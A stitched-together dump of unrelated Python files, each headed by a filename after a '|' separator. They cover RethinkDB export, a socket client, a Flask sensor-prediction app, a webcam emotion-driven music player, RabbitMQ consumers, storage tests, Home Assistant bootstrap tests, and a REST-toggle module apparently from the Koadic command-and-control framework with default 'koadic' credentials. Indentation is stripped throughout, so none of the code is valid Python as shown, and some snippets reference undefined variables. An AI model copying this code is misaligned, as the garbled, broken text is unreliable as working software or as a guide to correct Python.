allDatabases = options.retryQuery('list dbs', query.db_list().filter(query.row.ne('rethinkdb')))
for db_table in options.db_tables:
db, table = db_table
assert db != 'rethinkdb', "Error: Cannot export tables from the system database: 'rethinkdb'" # should not be possible
if db not in allDatabases:
raise RuntimeError("Error: Database '%s' not found" % db)
if table is None: # This is just a db name, implicitly selecting all tables in that db
db_table_set.update(set([x for x in allTables if x.db == db]))
else:
if utils_common.DbTable(db, table) not in allTables:
raise RuntimeError("Error: Table not found: '%s.%s'" % (db, table))
db_table_set.add(db_table)
# Determine the actual number of client processes we'll have
options.clients = min(options.clients, len(db_table_set))
# create the working directory and its structure
parentDir = os.path.dirname(options.directory)
if not os.path.exists(parentDir):
if os.path.isdir(parentDir):
raise RuntimeError("Output parent directory is not a directory: %s" % (opt, value))
try:
os.makedirs(parentDir)
except OSError as e:
raise optparse.OptionValueError("Unable to create parent directory for %s: %s (%s)" % (opt, value, e.strerror))
workingDir = tempfile.mkdtemp(prefix=os.path.basename(options.directory) + '_partial_', dir=os.path.dirname(options.directory))
try:
for db in set([db for db, table in db_table_set]):
os.makedirs(os.path.join(workingDir, str(db)))
except OSError as e:
raise RuntimeError("Failed to create temporary directory (%s): %s" % (e.filename, ex.strerror))
# Run the export
run_clients(options, workingDir, db_table_set)
# Move the temporary directory structure over to the original output directory
try:
if os.path.isdir(options.directory):
os.rmdir(options.directory) # an empty directory is created here when using _dump
elif os.path.exists(options.directory):
raise Exception('There was a file at the output location: %s' % options.directory)
os.rename(workingDir, options.directory)
except OSError as e:
raise RuntimeError("Failed to move temporary directory to output directory (%s): %s" % (options.directory, e.strerror))
def main(argv=None, prog=None):
options = parse_options(argv or sys.argv[1:], prog=prog)
start_time = time.time()
try:
run(options)
except Exception as ex:
if options.debug:
traceback.print_exc()
print(ex, file=sys.stderr)
return 1
if not options.quiet:
print(" Done (%.2f seconds)" % (time.time() - start_time))
return 0
if __name__ == "__main__":
sys.exit(main())
|
dns_server_client.py
|
import threading
from time import sleep
class DNSServerClient:
CLIENT_POLL_INTERVAL = 0.1
RECEIVE_SIZE = 1024
MESSAGE_END = '<END>'
def __init__(self, client_connection, address=None):
print('Created user from {}'.format(address))
self.client_connection = client_connection
self.address = address
self.done_handshake = False
self.poll_thread = None
# Variable to stop the poll threads
self.alive = True
self.inbox = []
self.start_polling()
def get_handshake_done(self):
return self.done_handshake
def handshake_done(self):
self.done_handshake = True
def is_alive(self):
return self.alive
def kill(self):
self.alive = False
def set_address(self, address):
self.address = address
def get_address(self):
return self.address
def get_next_message(self):
if self.inbox:
return self.inbox.pop(0)
else:
return None
def start_polling(self):
self.poll_thread = threading.Thread(target=self._client_poll)
self.poll_thread.start()
def _client_poll(self):
message = ''
while self.alive:
sleep(self.CLIENT_POLL_INTERVAL)
try:
data = self.client_connection.recv(self.RECEIVE_SIZE)
message += data.decode()
# Detect closed socket
if not data:
self.alive = False
print(message)
# For messages lager than the buffer, search for the message end.
if self.MESSAGE_END not in message:
continue
print('Received {} from {}'.format(message, self.address))
self.inbox.append(message)
except Exception as e:
print('Failed receiving, did the connection close? {}'.format(e))
self.alive = False
# Reset message for next message
message = ''
def send(self, message):
"""
Send a message to this client
:param message: The message to send
:return: None
"""
print('Sending: {}'.format(message))
try:
self.client_connection.sendall(str.encode(message))
except Exception as e:
print('Failed sending message: {} to: {}'.format(message, self.address))
def __str__(self):
return '{} alive: {}'.format(self.address, self.alive)
def __del__(self):
self.alive = False
self.client_connection.close()
|
app.py
|
from flask import Flask, jsonify, request
from pymongo import MongoClient
from datetime import datetime
from pytz import timezone
import threading
import time
import json
import os
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn.neural_network import MLPRegressor
app = Flask(__name__)
DB_URL = os.environ.get("DB_URL")
client = MongoClient(DB_URL)
db = client.db3
nodes = db.nodes
data = []
qtd_data = 0
TIME_TRAINING = 3600
# Setting the date in a string var...
datetime_format = "%d/%m/%Y %H:%M"
date_read = datetime.now()
date_time_last = str(date_read.strftime(datetime_format))
model_1 = MLPRegressor()
model_2 = MLPRegressor()
predictions_1 = []
predictions_2 = []
X_train_1 = None
X_test_1 = None
y_train_1 = None
y_test_1 = None
X_train_2 = None
X_test_2 = None
y_train_2 = None
y_test_2 = None
@ app.route('/', methods=['GET'])
def index():
global data
return jsonify(data)
@ app.route('/data', methods=['POST'])
def add_data():
id_node = request.json['id_node']
sensors = request.json['sensors']
tz = timezone('America/Sao_Paulo')
now = datetime.now()
datetimenow = now.astimezone(tz)
dt = datetimenow.strftime('%d/%m/%Y %H:%M')
_id = nodes.insert(
{'id_node': id_node, 'datetime': dt, 'sensors': sensors})
new_data = db.nodes.find_one({'_id': _id})
output = {'id_node': new_data['id_node'],
'datetime': new_data['datetime'], 'sensors': new_data['sensors']}
return jsonify(output)
@ app.route('/data', methods=['GET'])
def get_predict():
global model_1, model_2, y_test_1, predictions_1, y_test_2, predictions_2
now = datetime.now()
dt = str(now.strftime('%d/%m/%Y %H:%M'))
hora = now.hour*60
t = hora+now.minute
temperature = pd.Series(model_1.predict(np.array([[t]]))).to_json(
orient='values').replace('[', '').replace(']', '')
humidity = pd.Series(model_2.predict(np.array([[t]]))).to_json(
orient='values').replace('[', '').replace(']', '')
predictions_1 = model_1.predict(X_test_1)
predictions_2 = model_2.predict(X_test_2)
# print(predictions_1)
# print(predictions_2)
output = {
'datetime': dt,
'data_predict': {
'temperature': {
'value': round(float(temperature), 2),
'MAE': round(metrics.mean_absolute_error(y_test_1, predictions_1), 2),
'MSE': round(metrics.mean_squared_error(y_test_1, predictions_1), 2),
'RMSE': round(np.sqrt(metrics.mean_squared_error(y_test_1, predictions_1)), 2)
},
'humidity': {
'value': round(float(humidity), 2),
'MAE': round(metrics.mean_absolute_error(y_test_2, predictions_2), 2),
'MSE': round(metrics.mean_squared_error(y_test_2, predictions_2), 2),
'RMSE': round(np.sqrt(metrics.mean_squared_error(y_test_2, predictions_2)), 2)
}
},
}
return jsonify(output)
def get_data_initial():
global data, qtd_data
for i in nodes.find():
datetime_in_string = i['datetime']
dt = datetime.strptime(datetime_in_string, datetime_format)
hora = dt.hour*60
t = hora+dt.minute
data.append(
{'datetime': t, 'temperature': i['sensors'][0]['value'], 'humidity': i['sensors'][1]['value']})
qtd_data = len(data)
print("Base de dados inserida")
def training_initial():
global model_1, model_2, data, X_train_1, X_test_1, y_train_1, y_test_1, X_train_2, X_test_2, y_train_2, y_test_2
get_data_initial()
print("Training initial...")
df = pd.DataFrame(data)
X_train_1, X_test_1, y_train_1, y_test_1 = train_test_split(df.drop(
columns=['temperature', 'humidity']), df['temperature'], random_state=1)
X_train_2, X_test_2, y_train_2, y_test_2 = train_test_split(df.drop(
columns=['temperature', 'humidity']), df['humidity'], random_state=1)
model_1.fit(X_train_1, y_train_1)
model_2.fit(X_train_2, y_train_2)
print("initial models created")
def get_data():
global date_read, date_time_last, data, qtd_data
output = []
print("datetime last training:", date_time_last)
count = nodes.count_documents({})-qtd_data
print("qtd new data:", count)
if(count > 0):
c = 0
for i in nodes.find():
c = c+1
if(c > len(data)):
datetime_in_string = i['datetime']
dt = datetime.strptime(datetime_in_string, datetime_format)
hora = dt.hour*60
t = hora+dt.minute
output.append(
{'datetime': t, 'temperature': i['sensors'][0]['value'], 'humidity': i['sensors'][1]['value']})
data.append(
{'datetime': t, 'temperature': i['sensors'][0]['value'], 'humidity': i['sensors'][1]['value']})
date_read = datetime.now()
date_time_last = str(date_read.strftime(datetime_format))
qtd_data = len(data)
print("qtd data:", len(data))
return output
def training():
global model_1, model_2, data
while True:
time.sleep(TIME_TRAINING)
print("Training...")
dataNew = get_data()
if(len(dataNew) == 0):
print("nothing new for training")
else:
print("partial fit for new data")
df = pd.DataFrame(dataNew)
model_1.partial_fit(
df.drop(columns=['temperature', 'humidity']), df['temperature'])
model_2.partial_fit(
df.drop(columns=['temperature', 'humidity']), df['humidity'])
def startWebServer():
port = int(os.environ.get("PORT", 5001))
app.run(debug=True, host='0.0.0.0', port=port, threaded=True)
if __name__ == "__main__":
threading.Thread(target=training_initial).start()
threading.Thread(target=training).start()
startWebServer()
|
notebook.py
|
import os.path as osp
import sys
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import torch.hub
import os
import model
from PIL import Image
from torchvision import transforms
from visualize.grad_cam import BackPropagation, GradCAM,GuidedBackPropagation
import threading
import time
import vlc
from random import seed,random, randint
import pickle
from os.path import dirname, join
current_dir = os.path.dirname(os.path.realpath(__file__))
# Check CUDA availability
torch.cuda.is_available()
# We loaded the simple face detection model before image processing
faceCascade = cv2.CascadeClassifier(current_dir+'/visualize/haarcascade_frontalface_default.xml')
# Input image shape
shape = (48,48)
# Name Classes
classes = [
'Angry',
'Disgust',
'Fear',
'Happy',
'Sad',
'Surprised',
'Neutral'
]
# Setting the GPU as the Main Processor Unit
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Hide unnecessary messages
class HiddenPrints:
def __enter__(self):
self._original_stdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
def __exit__(self, exc_type, exc_val, exc_tb):
sys.stdout.close()
sys.stdout = self._original_stdout
# Pre-processing for face detection before model with opencv
def preprocess(image_path):
global faceCascade
global shape
transform_test = transforms.Compose([
transforms.ToTensor()
])
image = cv2.imread(image_path)
faces = faceCascade.detectMultiScale(
image,
scaleFactor=1.1,
minNeighbors=5,
minSize=(1, 1),
flags=cv2.CASCADE_SCALE_IMAGE
)
flag =0
if len(faces) == 0:
print('no face found')
face = cv2.resize(image, shape)
else:
(x, y, w, h) = faces[0]
face = image[y:y + h, x:x + w]
face = cv2.resize(face, shape)
flag=1
img = Image.fromarray(face).convert('L')
inputs = transform_test(img)
return inputs, face, flag
# Plot the results for testing
def plotImage(path, mylabel):
global shape
img = cv2.imread(path)
dimensions = img.shape
height = img.shape[0]
width = img.shape[1]
cv2.putText(img, mylabel,(round(width/2)-40,height-20), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA)
cv2.imwrite(current_dir+'/temp-images/display.jpg',img)
img = cv2.imread(current_dir+'/temp-images/display.jpg')
cv2.imshow('image',img)
k = cv2.waitKey(30) & 0xff
# Emotion detection with Pytorch model
def detect_emotion(images, model_name):
global classes
global device
flag=0
with HiddenPrints():
for i, image in enumerate(images):
target, raw_image,flag = preprocess(image['path'])
image['image'] = target
image['raw_image'] = raw_image
net = model.Model(num_classes=len(classes)).to(device)
checkpoint = torch.load(os.path.join(current_dir+'/model', model_name), map_location=device)
net.load_state_dict(checkpoint['net'])
net.eval()
result_images = []
label = ""
if(flag):
for index, image in enumerate(images):
with HiddenPrints():
img = torch.stack([image['image']]).to(device)
bp = BackPropagation(model=net)
probs, ids = bp.forward(img)
actual_emotion = ids[:,0]
label = classes[actual_emotion.data]
plotImage(image['path'],label)
else:
plotImage(image['path'],label)
return label
# Seed label
with open(current_dir+"/label", "wb") as f:
pickle.dump("", f)
# Thread 1: Emotion detection
def detection():
global classes
video_capture = cv2.VideoCapture(0)
while 1:
ret, frame = video_capture.read()
cv2.imwrite(current_dir+'/temp-images/test.jpg',frame)
detection = detect_emotion(images=[{'path': current_dir+'/temp-images/test.jpg'}],model_name='emotions.t7')
with open(current_dir+"/label", "wb") as f:
pickle.dump(detection, f)
# Thread 2: Music control according to detected emotion
def music():
global classes
seed(round(random()*10))
counter = [0,0,0,0,0,0,0]
label=""
# We start the program assuming the person feels neutral
status="Neutral"
memstatus=""
flag = 0
entries = os.listdir(current_dir+'/music/Favs/')
value = randint(0, len(entries)-1)
p = vlc.MediaPlayer(current_dir+"/music/Favs/"+entries[value])
p.play()
while 1:
# The emotion check is done approximately every 10 seconds
try:
with open(current_dir+"/label", "rb") as f:
label = pickle.load(f)
time.sleep(1)
y=0
for x in classes:
if(x==label):
counter[y] = counter[y] + 1
y = y + 1
y=0
for x in counter:
if(x == 10):
status = classes[y]
counter = [0,0,0,0,0,0,0]
flag = 1
break
y = y + 1
"""
According to the detected emotion we will randomly reproduce a song from one of our playlists:
- If the person is angry we will play a song that generates calm
- If the person is sad, a song for the person to be happy
- If the person is neutral or happy we will play some of their favorite songs
Note: If the detected emotion has not changed, the playlist will continue without changing the song.
"""
if((status=='Angry' and flag and status!=memstatus) or (not(p.is_playing()) and status=='Angry' and flag)):
seed(round(random()*10))
memstatus = status
p.stop()
entries = os.listdir(current_dir+'/music/Chill/')
value = randint(0, len(entries)-1)
p = vlc.MediaPlayer(current_dir+"/music/Chill/"+entries[value])
p.play()
elif(((status=='Neutral' or status=='Happy') and flag and status!=memstatus) or (not(p.is_playing()) and (status=='Neutral' or status=='Happy') and flag)):
seed(round(random()*10))
memstatus = status
p.stop()
entries = os.listdir(current_dir+'/music/Favs/')
value = randint(0, len(entries)-1)
p = vlc.MediaPlayer(current_dir+"/music/Favs/"+entries[value])
p.play()
elif((status=='Sad' and flag and status!=memstatus) or (not(p.is_playing()) and status=='Sad' and flag)):
seed(round(random()*10))
memstatus = status
p.stop()
entries = os.listdir(current_dir+'/music/Happy/')
value = randint(0, len(entries)-1)
p = vlc.MediaPlayer(current_dir+"/music/Happy/"+entries[value])
p.play()
except:
...
# We take advantage of multiple processing to perform this process more efficiently
d = threading.Thread(target=detection, name='detection')
m = threading.Thread(target=music, name='music')
d.start()
m.start()
|
webrequest.py
|
import requests
import threading
from multiprocessing.pool import ThreadPool
import time
import sys
URL = "http://192.168.219.158:80/facerec"
webcamStreamURL="192.168.219.142:8090/?action=snapshot"
def faceAuthRequest(requestParams,retJson):
res = requests.get(URL,params=requestParams,timeout=20)
res.status_code
retJson= res.json()
return
jsonParams = {'username':'parkjaehyun','stream_url':webcamStreamURL}
if __name__ == '__main__':
retJson=0
getRequestThread = threading.Thread(target=faceAuthRequest,args=(jsonParams,retJson,))
getRequestThread.start()
getRequestThread.join(timeout=21.0)
if getRequestThread.isAlive(): # after 30sec ,thread:
print("face Recognize Failed, please reload Face Recgnize Module..")
sys.exit(1)
print(retJson)
sys.exit(0)
|
SPOR_BASIC_5.py
|
#!/usr/bin/env python3
import sys
import os
import re
import subprocess
from threading import Thread
import TEST_FIO
import TEST_LIB
import TEST_LOG
import TEST_SETUP_POS
arrayId = 0
volId = 1
current_test = 0
############################################################################
# Test Description
# Multi threads simultaneously write patterns to the volume,
# simulate SPOR,
# and verify all patterns to see pos works properly
############################################################################
def test(size):
global current_test
current_test = current_test + 1
TEST_LOG.print_notice("[{} - Test {} Started]".format(filename, current_test))
write_size = TEST_LIB.parse_size(size)
max_num_thread = int(TEST_LIB.get_num_thread())
thread_list = []
for idx in range(max_num_thread):
TEST_LIB.create_new_pattern(arrayId, volId)
th = Thread(target=TEST_FIO.write, args=(arrayId, volId, write_size * idx, size, TEST_LIB.get_latest_pattern(arrayId, volId)))
thread_list.append(th)
th.start()
for th in thread_list:
th.join()
TEST_SETUP_POS.trigger_spor()
TEST_SETUP_POS.dirty_bringup()
TEST_SETUP_POS.create_subsystem(arrayId, volId)
TEST_SETUP_POS.mount_volume(arrayId, volId)
for idx in range(max_num_thread):
TEST_FIO.verify(arrayId, volId, write_size * idx, size, TEST_LIB.get_pattern(arrayId, volId, idx))
TEST_LOG.print_notice("[Test {} Completed]".format(current_test))
def execute():
sizes = ['1M']
for _size in sizes:
test(size=_size)
if __name__ == "__main__":
global filename
filename = sys.argv[0].split("/")[-1].split(".")[0]
TEST_LIB.set_up(argv=sys.argv, test_name=filename)
TEST_SETUP_POS.clean_bringup()
TEST_SETUP_POS.create_subsystem(arrayId, volId)
TEST_SETUP_POS.create_volume(arrayId, volId)
execute()
TEST_LIB.tear_down(test_name=filename)
|
genclocks.py
|
#!/usr/bin/env python
'''
Copyright (c) 2020 Modul 9/HiFiBerry
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
#!/usr/bin/env python
import logging
import signal
import time
import sys
from threading import Thread
import alsaaudio
from hifiberrydsp.hardware.adau145x import Adau145x
from hifiberrydsp.client.sigmatcp import SigmaTCPClient
stopped = False
device="default"
waitseconds=0
PERIODSIZE=1024
BYTESPERSAMPLE=8
pcm=None
sigmatcp=None
def silenceloop():
global stopped
global pcm
try:
pcm=alsaaudio.PCM(alsaaudio.PCM_PLAYBACK, device=device)
except:
logging.debug("sound card probably in use, doing nothing")
return
logging.debug("SPDIF lock, playing silence")
while spdifactive() and not(stopped):
time.sleep(1)
logging.debug("not stopped")
pcm=None
def spdifactive():
inputlock = int.from_bytes(sigmatcp.read_memory(0xf600, 2),byteorder='big') & 0x0001
return inputlock > 0
def stop_playback(_signalNumber, _frame):
global stopped
logging.info("received USR1, stopping music playback")
stopped = True
# Re-activate in 15 seconds
t = Thread(target=activate_again, args=(15,))
t.start()
def activate_again(seconds):
time.sleep(seconds)
global stopped
stopped=False
def main():
global sigmatcp
if len(sys.argv) > 1:
if "-v" in sys.argv:
logging.basicConfig(format='%(levelname)s: %(name)s - %(message)s',
level=logging.DEBUG,
force=True)
else:
logging.basicConfig(format='%(levelname)s: %(name)s - %(message)s',
level=logging.INFO,
force=True)
signal.signal(signal.SIGUSR1, stop_playback)
sigmatcp = SigmaTCPClient(Adau145x(),"127.0.0.1")
while True:
time.sleep(1)
if stopped:
logging.debug("stopped")
continue
if (spdifactive()):
silenceloop()
else:
logging.debug("no SPDIF lock, sleeping")
if __name__ == '__main__':
main()
|
consumer.py
|
#!/usr/bin/env python
import threading
import pika
import ast
import time
class ConsumeManager:
def __init__(self, queue_name):
# Initial setting for RabbitMQ
pika_params = pika.ConnectionParameters(
host='rabbitmq',
connection_attempts=10,
heartbeat=0
)
# Creating connection
self.pika_conn = pika.BlockingConnection(pika_params)
self.channel = self.pika_conn.channel()
self.channel.queue_declare(
queue=queue_name,
auto_delete=False,
durable=True
)
class Consumer(ConsumeManager):
def __init__(self, queue_name):
ConsumeManager.__init__(self, queue_name)
self.queue_name = queue_name
self.channel.basic_qos(prefetch_count=1)
def execute(self):
try:
self.channel.basic_consume(
queue=self.queue_name,
on_message_callback=self.callback,
auto_ack=True
)
self.channel.start_consuming()
except Exception as e:
print(e)
def callback(self, ch, method, properties, body):
try:
body = body.decode("UTF-8")
body = ast.literal_eval(body)
print(f'queue_name: {self.queue_name}, body: {body}')
# time.sleep(3)
"""
start ML task here.
"""
# test
# raise Exception('raise Exception')
except Exception as e:
print(e)
THREADS = 10
if __name__ == '__main__':
threads = []
for thread in range(THREADS):
print(f"\n[CREATE]: threading of task1-{thread}.")
receiver = Consumer(queue_name='task1')
t1 = threading.Thread(target=receiver.execute)
t1.daemon = True
threads.append(t1)
t1.start()
print(f"\n[CREATE]: threading of task2-{thread}.")
receiver = Consumer(queue_name='task2')
t2 = threading.Thread(target=receiver.execute)
t2.daemon = True
threads.append(t2)
t2.start()
for t in threads:
t.join()
|
api.py
|
import core.rest_server
import time
import sys
import os
DESCRIPTION = "turn off/on the rest api"
def autocomplete(shell, line, text, state):
return None
def help(shell):
shell.print_plain("")
shell.print_plain("Turning on the REST Server:")
shell.print_plain("api on (--user USERNAME --pass PASSWORD --port PORT)")
shell.print_plain("Username and password defaults to 'koadic'. Port defaults to 9990.")
shell.print_plain("")
shell.print_plain("Turning off the REST Server:")
shell.print_plain("api off")
shell.print_plain("")
def execute(shell, cmd):
splitted = cmd.split()
if len(splitted) > 1:
username = "koadic"
password = "koadic"
port = "9990"
remote = False
secure = []
if "--user" in splitted:
username = splitted[splitted.index("--user")+1]
if "--pass" in splitted:
password = splitted[splitted.index("--pass")+1]
if "--port" in splitted:
port = splitted[splitted.index("--port")+1]
if "--remote" in splitted:
remote = True
if "--cert" in splitted and "--key" in splitted:
secure = [splitted[splitted.index("--cert")+1], splitted[splitted.index("--key")+1]]
sw = splitted[1].lower()
if sw == "on":
if not shell.rest_thread:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(('127.0.0.1', int(port)))
except OSError as e:
if e.errno == 98:
shell.print_error("Port %s is already bound!" % (port))
elif e.errno == 13:
shell.print_error("Port %s bind permission denied!" % (port))
s.close()
return
s.close()
rest_server = core.rest_server.RestServer(shell, port, username, password, remote, secure)
def thread_rest_server():
try:
rest_server.run()
except SystemExit:
pass
shell.rest_thread = core.rest_server.KThread(target=thread_rest_server)
shell.rest_thread.daemon = True
stdout = sys.stdout
f = open(os.devnull, 'w')
sys.stdout = f
shell.rest_thread.start()
time.sleep(2)
sys.stdout = stdout
# ok, now THIS is the most embarassing thing i've ever done.
# i don't know how to pass exceptions from the thread to the caller.
# so here we are.
if "started" in shell.rest_thread.localtrace(0,0,0).__str__():
shell.print_good("Rest server running on port %s" % port)
shell.print_status("Username: %s" % username)
shell.print_status("Password: %s" % password)
shell.print_status("API Token: %s" % rest_server.token)
else:
shell.rest_thread.kill()
shell.rest_thread = ""
shell.print_error("Could not start rest server.")
else:
shell.print_error("Rest server already running")
elif sw == "off":
if shell.rest_thread:
shell.rest_thread.kill()
shell.rest_thread = ""
shell.print_good("Rest server shutdown")
else:
shell.print_error("Rest server not running")
else:
help(shell)
|
main.py
|
from threading import *
from terminal import *
import listener
cmd = ''
if __name__ == '__main__':
#terminal
terminal = Terminal()
terminal_thread = Thread(target=terminal.cmdloop)
terminal_thread.start()
#web
print('Starting Webserver')
listener.run()
|
test_bootstrap.py
|
"""Test the bootstrapping."""
# pylint: disable=too-many-public-methods,protected-access
import tempfile
from unittest import mock
import threading
import logging
import voluptuous as vol
from homeassistant import bootstrap, loader
import homeassistant.util.dt as dt_util
from homeassistant.helpers.config_validation import PLATFORM_SCHEMA
from tests.common import \
get_test_home_assistant, MockModule, MockPlatform, assert_setup_component
ORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE
_LOGGER = logging.getLogger(__name__)
class TestBootstrap:
"""Test the bootstrap utils."""
hass = None
backup_cache = None
# pylint: disable=invalid-name, no-self-use
def setup_method(self, method):
"""Setup the test."""
self.backup_cache = loader._COMPONENT_CACHE
if method == self.test_from_config_file:
return
self.hass = get_test_home_assistant()
def teardown_method(self, method):
"""Clean up."""
if method == self.test_from_config_file:
return
dt_util.DEFAULT_TIME_ZONE = ORIG_TIMEZONE
self.hass.stop()
loader._COMPONENT_CACHE = self.backup_cache
@mock.patch('homeassistant.util.location.detect_location_info',
return_value=None)
def test_from_config_file(self, mock_detect):
"""Test with configuration file."""
components = ['browser', 'conversation', 'script']
with tempfile.NamedTemporaryFile() as fp:
for comp in components:
fp.write('{}:\n'.format(comp).encode('utf-8'))
fp.flush()
self.hass = bootstrap.from_config_file(fp.name)
components.append('group')
assert sorted(components) == sorted(self.hass.config.components)
def test_handle_setup_circular_dependency(self):
"""Test the setup of circular dependencies."""
loader.set_component('comp_b', MockModule('comp_b', ['comp_a']))
def setup_a(hass, config):
"""Setup the another component."""
bootstrap.setup_component(hass, 'comp_b')
return True
loader.set_component('comp_a', MockModule('comp_a', setup=setup_a))
bootstrap.setup_component(self.hass, 'comp_a')
assert ['comp_a'] == self.hass.config.components
def test_validate_component_config(self):
"""Test validating component configuration."""
config_schema = vol.Schema({
'comp_conf': {
'hello': str
}
}, required=True)
loader.set_component(
'comp_conf', MockModule('comp_conf', config_schema=config_schema))
assert not bootstrap._setup_component(self.hass, 'comp_conf', {})
assert not bootstrap._setup_component(self.hass, 'comp_conf', {
'comp_conf': None
})
assert not bootstrap._setup_component(self.hass, 'comp_conf', {
'comp_conf': {}
})
assert not bootstrap._setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
'invalid': 'extra',
}
})
assert bootstrap._setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
}
})
def test_validate_platform_config(self):
"""Test validating platform configuration."""
platform_schema = PLATFORM_SCHEMA.extend({
'hello': str,
})
loader.set_component(
'platform_conf',
MockModule('platform_conf', platform_schema=platform_schema))
loader.set_component(
'platform_conf.whatever', MockPlatform('whatever'))
with assert_setup_component(0):
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'hello': 'world',
'invalid': 'extra',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
},
'platform_conf 2': {
'invalid': True
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(0):
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'not_existing',
'hello': 'world',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': [{
'platform': 'whatever',
'hello': 'world',
}]
})
self.hass.config.components.remove('platform_conf')
# Any falsey platform config will be ignored (None, {}, etc)
with assert_setup_component(0) as config:
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': None
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': {}
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
def test_component_not_found(self):
"""setup_component should not crash if component doesn't exist."""
assert not bootstrap.setup_component(self.hass, 'non_existing')
def test_component_not_double_initialized(self):
"""Test we do not setup a component twice."""
mock_setup = mock.MagicMock(return_value=True)
loader.set_component('comp', MockModule('comp', setup=mock_setup))
assert bootstrap.setup_component(self.hass, 'comp')
assert mock_setup.called
mock_setup.reset_mock()
assert bootstrap.setup_component(self.hass, 'comp')
assert not mock_setup.called
@mock.patch('homeassistant.util.package.install_package',
return_value=False)
def test_component_not_installed_if_requirement_fails(self, mock_install):
"""Component setup should fail if requirement can't install."""
self.hass.config.skip_pip = False
loader.set_component(
'comp', MockModule('comp', requirements=['package==0.0.1']))
assert not bootstrap.setup_component(self.hass, 'comp')
assert 'comp' not in self.hass.config.components
def test_component_not_setup_twice_if_loaded_during_other_setup(self):
"""Test component setup while waiting for lock is not setup twice."""
loader.set_component('comp', MockModule('comp'))
result = []
def setup_component():
"""Setup the component."""
result.append(bootstrap.setup_component(self.hass, 'comp'))
with bootstrap._SETUP_LOCK:
thread = threading.Thread(target=setup_component)
thread.start()
self.hass.config.components.append('comp')
thread.join()
assert len(result) == 1
assert result[0]
def test_component_not_setup_missing_dependencies(self):
"""Test we do not setup a component if not all dependencies loaded."""
deps = ['non_existing']
loader.set_component('comp', MockModule('comp', dependencies=deps))
assert not bootstrap._setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
self.hass.config.components.append('non_existing')
assert bootstrap._setup_component(self.hass, 'comp', {})
def test_component_failing_setup(self):
"""Test component that fails setup."""
loader.set_component(
'comp', MockModule('comp', setup=lambda hass, config: False))
assert not bootstrap._setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_component_exception_setup(self):
"""Test component that raises exception during setup."""
def exception_setup(hass, config):
"""Setup that raises exception."""
raise Exception('fail!')
loader.set_component('comp', MockModule('comp', setup=exception_setup))
assert not bootstrap._setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_home_assistant_core_config_validation(self):
"""Test if we pass in wrong information for HA conf."""
# Extensive HA conf validation testing is done in test_config.py
assert None is bootstrap.from_config_dict({
'homeassistant': {
'latitude': 'some string'
}
})
def test_component_setup_with_validation_and_dependency(self):
"""Test all config is passed to dependencies."""
def config_check_setup(hass, config):
"""Setup method that tests config is passed in."""
if config.get('comp_a', {}).get('valid', False):
return True
raise Exception('Config not passed in: {}'.format(config))
loader.set_component('comp_a',
MockModule('comp_a', setup=config_check_setup))
loader.set_component('switch.platform_a', MockPlatform('comp_b',
['comp_a']))
bootstrap.setup_component(self.hass, 'switch', {
'comp_a': {
'valid': True
},
'switch': {
'platform': 'platform_a',
}
})
assert 'comp_a' in self.hass.config.components
def test_platform_specific_config_validation(self):
"""Test platform that specifies config."""
platform_schema = PLATFORM_SCHEMA.extend({
'valid': True,
}, extra=vol.PREVENT_EXTRA)
mock_setup = mock.MagicMock()
loader.set_component(
'switch.platform_a',
MockPlatform(platform_schema=platform_schema,
setup_platform=mock_setup))
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'invalid': True
}
})
assert mock_setup.call_count == 0
self.hass.config.components.remove('switch')
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True,
'invalid_extra': True,
}
})
assert mock_setup.call_count == 0
self.hass.config.components.remove('switch')
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True
}
})
assert mock_setup.call_count == 1
